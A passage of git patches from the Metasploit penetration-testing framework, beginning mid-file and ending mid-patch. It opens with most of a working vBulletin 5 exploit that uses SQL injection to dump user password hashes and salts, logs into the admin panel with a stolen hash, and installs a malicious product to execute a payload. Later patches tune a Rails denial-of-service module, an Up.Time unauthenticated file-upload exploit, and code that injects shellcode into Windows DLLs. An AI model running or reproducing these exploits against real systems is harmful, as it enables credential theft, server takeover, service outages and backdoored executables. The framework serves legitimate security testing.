+    if min > max
+      print_error("#{peer} - MINNODE can't be major than MAXNODE")
+      return nil
+    end
+
+    for node_id in min..max
+      if exists_node?(node_id)
+        return node_id
+      end
+    end
+
+    return nil
+  end
+
+  def get_node
+    if datastore['NODE'].nil? or datastore['NODE'] <= 0
+      print_status("#{peer} - Brute forcing to find a valid node id...")
+      return brute_force_node
+    end
+
+    print_status("#{peer} - Checking node id #{datastore['NODE']}...")
+    if exists_node?(datastore['NODE'])
+      return datastore['NODE']
+    else
+      return nil
+    end
+  end
+
+  def do_sqli(node, query)
+    mark = Rex::Text.rand_text_alpha(5 + rand(3))
+    random_and = Rex::Text.rand_text_numeric(4)
+    injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
+    injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
+    injection << "AND (#{random_and}=#{random_and}"
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
+      'vars_post' =>
+        {
+          'nodeid'  => "#{node}#{injection}",
+        }
+      })
+
+    unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
+      return nil
+    end
+
+    data = ""
+
+    if res.body.to_s =~ /#{mark}(.*)#{mark}/
+      data = $1
+    end
+
+    return data
+  end
+
+  def get_user_data(node_id, user_id)
+    user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
+    pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
+    salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
+
+    return [user, pass, salt]
+  end
+
+  def do_login(user, hash)
+    res = send_request_cgi({
+      'uri'           => normalize_uri(target_uri.path, "login.php"),
+      'method'        => 'POST',
+      'encode_params' => false,
+      'vars_get'      => {
+        'do' => 'login'
+      },
+      'vars_post'     => {
+        'url'                      => '%2Fadmincp%2F',
+        'securitytoken'            => 'guest',
+        'logintype'                => 'cplogin',
+        'do'                       => 'login',
+        'vb_login_md5password'     => hash,
+        'vb_login_md5password_utf' => hash,
+        'vb_login_username'        => user,
+        'vb_login_password'        => '',
+        'cssprefs'                 => ''
+      }
+    })
+
+    if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
+      session = res.get_cookies
+    else
+      return nil
+    end
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path, "admincp", "/"),
+      'cookie' => session
+    })
+
+    if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
+      return session
+    else
+      return nil
+    end
+
+  end
+
+  def get_token(response)
+    token_info = {
+      :session_hash => "",
+      :security_token => "",
+      :admin_hash => ""
+    }
+
+    if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
+      token_info[:session_hash] = $1
+    end
+
+    if response =~ /var ADMINHASH = "([0-9a-f]+)";/
+      token_info[:admin_hash] = $1
+    end
+
+    if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
+      token_info[:security_token] = $1
+    end
+
+    return token_info
+  end
+
+  def get_install_token
+    res = send_request_cgi({
+      "uri"      => normalize_uri(target_uri.path, "admincp", "product.php"),
+      "vars_get" => {
+        "do" => "productadd"
+      },
+      "cookie"   => @session
+    })
+
+    unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
+      return nil
+    end
+
+
+    return get_token(res.body.to_s)
+  end
+
+  def install_product(token_info)
+
+    xml_product = <<-EOF
+<?xml version="1.0" encoding="ISO-8859-1"?>
+
+<product productid="#{@product_id}" active="0">
+  <title>#{@product_id}</title>
+  <description>#{@product_id}</description>
+  <version>1.0</version>
+  <url>http://#{@product_id}.loc</url>
+  <versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
+  <dependencies>
+    <dependency dependencytype="vbulletin" minversion="" maxversion="" />
+  </dependencies>
+  <codes>
+    <code version="*">
+      <installcode>
+        <![CDATA[
+        #{payload.encoded}
+        ]]>
+      </installcode>
+      <uninstallcode />
+    </code>
+  </codes>
+  <templates>
+  </templates>
+  <stylevardfns>
+  </stylevardfns>
+  <stylevars>
+  </stylevars>
+  <hooks>
+  </hooks>
+  <phrases>
+  </phrases>
+  <options>
+  </options>
+  <helptopics>
+  </helptopics>
+  <cronentries>
+  </cronentries>
+  <faqentries>
+  </faqentries>
+  <widgets>
+  </widgets>
+</product>
+    EOF
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
+    post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
+    post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
+    post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
+    post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
+    post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
+    post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
+
+    # Work around an incompatible MIME implementation
+    data = post_data.to_s
+    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
+
+    res = send_request_cgi({
+      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
+      'method'   => "POST",
+      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie'   => @session,
+      'vars_get' => {
+        "do" => "productimport"
+      },
+      'data'     => data
+    })
+
+    if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
+      return true
+    elsif res
+      fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
+    else
+      return false
+    end
+
+  end
+
+  def get_delete_token
+    res = send_request_cgi({
+      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
+      'cookie'   => @session,
+      'vars_get' => {
+        "do" => "productdelete",
+        "productid" => @product_id,
+        "s" => @session_hash
+      }
+    })
+
+    if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
+      return get_token(res.body.to_s)
+    end
+
+    return nil
+  end
+
+  def delete_product(token_info)
+    res = send_request_cgi({
+      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
+      'method'   => "POST",
+      'cookie'   => @session,
+      'vars_get' => {
+        "do" => "productkill"
+      },
+      'vars_post' => {
+        "s"             => token_info[:session_hash],
+        "do"            => "productkill",
+        "adminhash"     => token_info[:admin_hash],
+        "securitytoken" => token_info[:security_token],
+        "productid"     => @product_id
+      }
+    })
+
+    if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
+      return true
+    end
+
+    return false
+  end
+
+  def check
+    node_id = get_node
+
+    unless node_id.nil?
+      return Msf::Exploit::CheckCode::Vulnerable
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "index.php")
+    })
+
+    if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
+      return Msf::Exploit::CheckCode::Detected
+    end
+
+    return Msf::Exploit::CheckCode::Unknown
+  end
+
+  def on_new_session(session)
+    print_status("#{peer} - Getting the uninstall token info...")
+    delete_token = get_delete_token
+    if delete_token.nil?
+      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
+      return
+    end
+
+    print_status("#{peer} - Deleting the product #{@product_id}...")
+    if delete_product(delete_token)
+      print_good("#{peer} - Product #{@product_id} deleted")
+    else
+      print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Checking for a valid node id...")
+    node_id = get_node
+    if node_id.nil?
+      print_error("#{peer} - node id not found")
+      return
+    end
+
+    print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
+    data = do_sqli(node_id, "select count(*) from user")
+    if data.empty?
+      print_error("#{peer} - Error exploiting sqli")
+      return
+    end
+    count_users = data.to_i
+    users = []
+    print_good("#{peer} - #{count_users} users found")
+
+    for i in 0..count_users - 1
+      user = get_user_data(node_id, i)
+      report_auth_info({
+        :host => rhost,
+        :port => rport,
+        :user => user[0],
+        :pass => user[1],
+        :type => "hash",
+        :sname => (ssl ? "https" : "http"),
+        :proof => "salt: #{user[2]}" # Using proof to store the hash salt
+      })
+      users << user
+    end
+
+    @session = nil
+    users.each do |user|
+      print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
+      @session = do_login(user[0], user[1])
+      unless @session.blank?
+        print_good("#{peer} - Logged in successfully as #{user[0]}")
+        break
+      end
+    end
+
+    if @session.blank?
+      fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
+    end
+
+    print_status("#{peer} - Getting the install product security token...")
+    install_token = get_install_token
+    if install_token.nil?
+      fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
+    end
+
+    @session_hash = install_token[:session_hash]
+    @product_id = rand_text_alpha_lower(5 + rand(8))
+    print_status("#{peer} - Installing the malicious product #{@product_id}...")
+    if install_product(install_token)
+      print_good("#{peer} - Product successfully installed... payload should be executed...")
+    else
+      # Two situations trigger this path:
+      # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.
+      # 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.
+      # Because of that fail_with isn't used here.
+      return
+    end
+
+    print_status("#{peer} - Getting the uninstall token info...")
+    delete_token = get_delete_token
+    if delete_token.nil?
+      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
+      return
+    end
+
+    print_status("#{peer} - Deleting the product #{@product_id}...")
+    if delete_product(delete_token)
+      print_good("#{peer} - Product #{@product_id} deleted")
+    else
+      print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
+    end
+
+  end
+
+
+end

From af16f11784e4bd4addb1b909194e96d9a6d84cde Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 14:39:26 -0600
Subject: [PATCH 199/217] Another update

---
 .../auxiliary/dos/http/rails_action_view.rb   | 26 +++++++++++++++----
 1 file changed, 21 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index 9c95057bea..47f097a4ce 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('URIPATH',    [true, 'The URI to send the requests to', '/application']),
+        OptString.new('URIPATH',    [true, 'The URI that routes to a Rails controller action', '/']),
         OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
         OptInt.new('REQ_COUNT',     [true, 'Number of HTTP requests for each iteration', 500]),
         OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
@@ -56,9 +56,26 @@ class Metasploit3 < Msf::Auxiliary
     Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
   end
 
+  #
+  # Returns a modified version of the URI that:
+  # 1. Always has a starting slash
+  # 2. Removes all the double slashes
+  #
+  def normalize_uri(*strs)
+    new_str = strs * "/"
+
+    new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
+    # Makes sure there's a starting slash
+    unless new_str[0,1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
   def http_request
-    uri = datastore['URIPATH']
-    uri = "/#{uri}" if uri !~ /^\//
+    uri = normalize_uri(datastore['URIPATH'])
 
     http = ''
     http << "GET /#{uri} HTTP/1.1\r\n"
@@ -70,12 +87,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    payload = http_request
     begin
       print_status("Stressing the target memory, this will take a very long time...")
       datastore['RLIMIT'].times { |i|
         connect
-        datastore['REQ_COUNT'].times { sock.put(payload) }
+        datastore['REQ_COUNT'].times { sock.put(http_request) }
         disconnect
       }
 

From 9f5768ae37c30cd6a4ed5ca0f4baeffe11a26dd7 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 14:53:35 -0600
Subject: [PATCH 200/217] Another update

---
 modules/auxiliary/dos/http/rails_action_view.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index 47f097a4ce..2ccb672590 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
     uri = normalize_uri(datastore['URIPATH'])
 
     http = ''
-    http << "GET /#{uri} HTTP/1.1\r\n"
+    http << "GET #{uri} HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
     http << "Accept: #{long_string}\r\n"
     http << "\r\n"

From 58a70779aca9718ecc56875eb51122e1ee9dd335 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 15:48:59 -0600
Subject: [PATCH 201/217] Final update

---
 modules/auxiliary/dos/http/rails_action_view.rb | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index 2ccb672590..543a402881 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -38,10 +38,11 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('URIPATH',    [true, 'The URI that routes to a Rails controller action', '/']),
-        OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
-        OptInt.new('REQ_COUNT',     [true, 'Number of HTTP requests for each iteration', 500]),
-        OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
+        OptString.new('URIPATH',     [true, 'The URI that routes to a Rails controller action', '/']),
+        OptInt.new('MAXSTRINGSIZE',  [true, 'Max string size', 60000]),
+        OptInt.new('REQCOUNT',       [true, 'Number of HTTP requests to pipeline per connection', 1]),
+        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000]),
+        OptInt.new('PROGRESS_TIMER', [true, 'Number of seconds between each progress update', 10])
       ],
     self.class)
   end
@@ -88,10 +89,10 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     begin
-      print_status("Stressing the target memory, this will take a very long time...")
+      print_status("Stressing the target memory, this will take quite some time...")
       datastore['RLIMIT'].times { |i|
         connect
-        datastore['REQ_COUNT'].times { sock.put(http_request) }
+        datastore['REQCOUNT'].times { sock.put(http_request) }
         disconnect
       }
 

From 17193e06a96aab80b4cfcb7d0b48eab8f5b9d98e Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 15:49:44 -0600
Subject: [PATCH 202/217] Last commit, I swear

---
 modules/auxiliary/dos/http/rails_action_view.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index 543a402881..2401f0cca5 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('URIPATH',     [true, 'The URI that routes to a Rails controller action', '/']),
         OptInt.new('MAXSTRINGSIZE',  [true, 'Max string size', 60000]),
         OptInt.new('REQCOUNT',       [true, 'Number of HTTP requests to pipeline per connection', 1]),
-        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000]),
-        OptInt.new('PROGRESS_TIMER', [true, 'Number of seconds between each progress update', 10])
+        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000])
       ],
     self.class)
   end

From adc241faf853184be6271bc1c9440a488a0790d1 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 15:52:42 -0600
Subject: [PATCH 203/217] Last one, I say

---
 modules/auxiliary/dos/http/rails_action_view.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index 2401f0cca5..30b2a16db2 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
     new_str = new_str.gsub!("//", "/") while new_str.index("//")
 
     # Makes sure there's a starting slash
-    unless new_str[0,1] == '/'
+    unless new_str.start_with?("/")
       new_str = '/' + new_str
     end
 

From 2ff9c31747435f0d5be938c7f9be3411958f881e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 6 Dec 2013 15:57:22 -0600
Subject: [PATCH 204/217] Do minor clean up on uptime_file_upload

---
 .../exploits/linux/http/uptime_file_upload.rb | 27 ++++++++++++-------
 1 file changed, 17 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb
index 2e60fb4eb3..d8cffe813e 100644
--- a/modules/exploits/linux/http/uptime_file_upload.rb
+++ b/modules/exploits/linux/http/uptime_file_upload.rb
@@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Up.Time Monitoring post2file.php Arbitrary File Upload',
+      'Name'           => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload',
       'Description'    => %q{
-          This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server
-          7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading
-          to arbitrary code execution.
+          This module exploits an arbitrary file upload vulnerability found within the Up.Time
+          monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
+          webroot without authentication, leading to arbitrary code execution.
       },
       'Author'         =>
         [
@@ -27,11 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf']
+          [ 'OSVDB', '100423' ],
+          [ 'BID', '64031'],
+          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
         ],
       'Payload'            =>
         {
-          'BadChars' => "\x00"
+          'Space' => 10000, # just a big enough number to fit any PHP payload
+          'DisableNops' => true
         },
       'Platform'       => 'php',
       'Arch'         => ARCH_PHP,
@@ -42,7 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Nov 19 2013'))
 
-    register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class)
+    register_options([
+      OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
+      Opt::RPORT(9999)
+    ], self.class)
   end
 
   def check
@@ -53,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
     })
 
-    if res and res.code == 200
+    if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
       return Exploit::CheckCode::Appears
     end
 
@@ -66,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
     uri =  target_uri.path
 
     @payload_name = "#{rand_text_alpha(5)}.php"
-    php_payload = get_write_exec_payload(:unlink_self=>true)
+    php_payload = get_write_exec_payload(:unlink_self => true)
 
     post_data = ({
       "file_name" => @payload_name,
@@ -79,7 +85,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => normalize_uri(uri, 'wizards', 'post2file.php'),
       'vars_post'   => post_data,
     })
-    unless res and res.code == 200
+
+    unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
       fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 

From 3729c536900ac695993c86ee7bd60aa8cbb39eb8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 6 Dec 2013 15:57:52 -0600
Subject: [PATCH 205/217] Move uptime_file_upload to the correct location

---
 modules/exploits/{linux => multi}/http/uptime_file_upload.rb | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/exploits/{linux => multi}/http/uptime_file_upload.rb (100%)

diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/multi/http/uptime_file_upload.rb
similarity index 100%
rename from modules/exploits/linux/http/uptime_file_upload.rb
rename to modules/exploits/multi/http/uptime_file_upload.rb

From fdebfe3d2f20f49a59260b507d9a7d121f5bd7ee Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 7 Dec 2013 14:25:58 -0600
Subject: [PATCH 206/217] Add references

---
 modules/auxiliary/dos/http/rails_action_view.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index 30b2a16db2..ecf9b0e61b 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -30,6 +30,8 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           [ 'CVE', '2013-6414' ],
+          [ 'OSVDB', '100525' ],
+          [ 'BID', '64074' ],
           [ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
           [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
         ],

From c6eac67ab5c3172cdcbda4767cda6e2722f5b609 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sat, 7 Dec 2013 17:46:26 -0600
Subject: [PATCH 207/217] Kill meterpreter support for osx media modules.

There is some bug that I haven't been able to track down that causes the
osx call to run the event queue to just hang on latest OSX + Java/python
meterpreter. I tried rewriting these modules using OSX's new Media API,
but I run into the same problem. Until I find a solution, we should mark
these shell-only.
---
 modules/post/osx/manage/record_mic.rb | 2 +-
 modules/post/osx/manage/webcam.rb     | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/osx/manage/record_mic.rb b/modules/post/osx/manage/record_mic.rb
index 5dc1c16c5b..1c4ee89524 100644
--- a/modules/post/osx/manage/record_mic.rb
+++ b/modules/post/osx/manage/record_mic.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
       'License'       => MSF_LICENSE,
       'Author'        => [ 'joev'],
       'Platform'      => [ 'osx'],
-      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'SessionTypes'  => [ 'shell' ],
       'Actions'       => [
         [ 'LIST',     { 'Description' => 'Show a list of microphones' } ],
         [ 'RECORD', { 'Description' => 'Record from a selected audio input' } ]
diff --git a/modules/post/osx/manage/webcam.rb b/modules/post/osx/manage/webcam.rb
index dd152b366b..017ee04ca4 100644
--- a/modules/post/osx/manage/webcam.rb
+++ b/modules/post/osx/manage/webcam.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
       'License'       => MSF_LICENSE,
       'Author'        => [ 'joev'],
       'Platform'      => [ 'osx'],
-      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'SessionTypes'  => [ 'shell' ],
       'Actions'       => [
         [ 'LIST',     { 'Description' => 'Show a list of webcams' } ],
         [ 'SNAPSHOT', { 'Description' => 'Take a snapshot with the webcam' } ],

From 8d33138489dca181aea3c3600ed08044f4ec7787 Mon Sep 17 00:00:00 2001
From: scriptjunkie <scriptjunkie@scriptjunkie.us>
Date: Tue, 27 Nov 2012 21:43:19 -0600
Subject: [PATCH 208/217] Support silent shellcode injection into DLLs

Only run code on DLL_PROCESS_ATTACH, preventing infinite loop otherwise:
Added code would create thread -> calls DLL entry point -> calling added code...
---
 lib/msf/core/exe/segment_injector.rb | 30 +++++++++++++++++++++++-----
 lib/msf/util/exe.rb                  |  1 -
 2 files changed, 25 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exe/segment_injector.rb b/lib/msf/core/exe/segment_injector.rb
index 00ef277daa..a262ba830c 100644
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -31,7 +31,6 @@ module Exe
 
     def create_thread_stub
       <<-EOS
-        hook_entrypoint:
         pushad
         push hook_libname
         call [iat_LoadLibraryA]
@@ -68,8 +67,9 @@ module Exe
       return asm
     end
 
-    def payload_stub
-      asm = create_thread_stub
+    def payload_stub(prefix)
+      asm = "hook_entrypoint:\n#{prefix}\n"
+      asm << create_thread_stub
       asm << payload_as_asm
       shellcode = Metasm::Shellcode.assemble(processor, asm)
       shellcode.encoded
@@ -85,14 +85,34 @@ module Exe
       pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
       pe.header.time = pe_orig.header.time
 
+      prefix = ''
+      if pe.header.characteristics.include? "DLL"
+        # if there is no entry point, just return after we bail or spawn shellcode
+        if pe.optheader.entrypoint == 0
+          prefix = "cmp [esp + 8], 1
+              jz spawncode
+entrypoint:
+              xor eax, eax
+              inc eax
+              ret 0x0c
+              spawncode:"
+        else
+          # there is an entry point, we'll need to go to it after we bail or spawn shellcode
+          # if fdwReason != DLL_PROCESS_ATTACH, skip the shellcode, jump back to original DllMain
+          prefix = "cmp [esp + 8], 1
+              jnz entrypoint"
+        end
+      end
       # Generate a new code section set to RWX with our payload in it
       s = Metasm::PE::Section.new
       s.name = '.text'
-      s.encoded = payload_stub
+      s.encoded = payload_stub prefix
       s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
 
       # Tell our section where the original entrypoint was
-      s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
+      if pe.optheader.entrypoint != 0
+        s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
+      end
       pe.sections << s
       pe.invalidate_header
 
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 776cedcb74..6c5ed8a706 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1774,4 +1774,3 @@ def self.to_vba(framework,code,opts={})
 end
 end
 end
-

From 77e9996501cad5b62c436769b4cd2d86de10c09c Mon Sep 17 00:00:00 2001
From: scriptjunkie <scriptjunkie@scriptjunkie.us>
Date: Sat, 7 Dec 2013 20:54:13 -0600
Subject: [PATCH 209/217] Mitigate metasm relocation error by disabling ASLR
 Deal with import error by actually using the GetProcAddress code.

---
 lib/msf/core/exe/segment_injector.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exe/segment_injector.rb b/lib/msf/core/exe/segment_injector.rb
index a262ba830c..829ed71cdf 100644
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -37,7 +37,6 @@ module Exe
         push hook_funcname
         push eax
         call [iat_GetProcAddress]
-        mov eax, [iat_CreateThread]
         lea edx, [thread_hook]
         push 0
         push 0
@@ -85,6 +84,9 @@ module Exe
       pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
       pe.header.time = pe_orig.header.time
 
+      # Don't rebase if we can help it since Metasm doesn't do relocations well
+      pe.optheader.dll_characts.delete("DYNAMIC_BASE")
+
       prefix = ''
       if pe.header.characteristics.include? "DLL"
         # if there is no entry point, just return after we bail or spawn shellcode

From f4636c46a6b8a2e5b9e819c3c6ea56da2b2fe966 Mon Sep 17 00:00:00 2001
From: scriptjunkie <scriptjunkie@scriptjunkie.us>
Date: Sat, 7 Dec 2013 20:55:51 -0600
Subject: [PATCH 210/217] Removing unused endjunk, sections_end, cert_entry

---
 lib/msf/util/exe.rb | 10 ----------
 1 file changed, 10 deletions(-)

diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 6c5ed8a706..12b1242090 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -169,21 +169,11 @@ require 'msf/core/exe/segment_injector'
     payload = win32_rwx_exec(code)
 
     # Create a new PE object and run through sanity checks
-    endjunk = true
     fsize = File.size(opts[:template])
     pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
     text = nil
-    sections_end = 0
     pe.sections.each do |sec|
       text = sec if sec.name == ".text"
-      sections_end = sec.size + sec.file_offset if sec.file_offset >= sections_end
-      endjunk = false if sec.contains_file_offset?(fsize-1)
-    end
-    #also check to see if there is a certificate
-    cert_entry = pe.hdr.opt['DataDirectory'][4]
-    #if the cert is the only thing past the sections, we can handle.
-    if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
-      endjunk = false
     end
 
     #try to inject code into executable by adding a section without affecting executable behavior

From 3c67f1c6a9db3349380493643b30579c57c1e468 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 8 Dec 2013 18:57:10 +0000
Subject: [PATCH 211/217] Fix file download

---
 .../ui/console/command_dispatcher/extapi/clipboard.rb            | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
index 8cae9389d6..6315700e07 100644
